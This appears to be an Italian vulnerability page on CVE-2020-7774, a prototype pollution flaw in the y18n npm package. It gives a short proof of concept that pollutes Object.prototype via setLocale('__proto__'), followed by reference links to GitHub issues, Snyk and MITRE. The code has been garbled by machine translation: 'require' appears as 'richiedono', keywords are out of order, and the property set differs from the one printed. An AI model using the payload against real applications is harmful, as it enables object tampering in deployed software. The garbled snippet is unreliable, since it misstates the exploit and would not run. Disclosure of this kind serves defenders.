Vulnerabilità: CVE-2020-7774

Questo influenza il y18n pacchetto prima 3.2.2, 4.0.1 e 5.0.5. PoC per po6ix: y18n const = richiedono ( ‘y18n’) (); y18n.setLocale ( ‘__ proto__’); y18n.updateLocale ({inquinati: true}); console.log (inquinata); // vero


https://github.com/yargs/y18n/issues/96
https://github.com/yargs/y18n/issues/96
https://github.com/yargs/y18n/pull/108
https://github.com/yargs/y18n/pull/108
https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306
https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306
https://snyk.io/vuln/SNYK-JS-Y18N-1021887
https://snyk.io/vuln/SNYK-JS-Y18N-1021887
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7774


E' possibile lasciare un commento come utenti registrati al sito, accedendo tramite social, account wordpress oppure come utenti anonimi. Nel caso in cui si desideri lasciare un commento come utenti anonimi si verrà avvisati via email di un'eventuale risposta solo se si inserisce l'indirizzo email (facoltativo). L'inserimento di qualsiasi dato nei campi dei commenti è totalmente facoltativo. Chiunque decida di inserire un qualsiasi dato accetta il trattamento di questi ultimi per i fini inerenti al servizio ovvero la risposta al commento e le comunicazioni strettamente necessarie.


Rispondi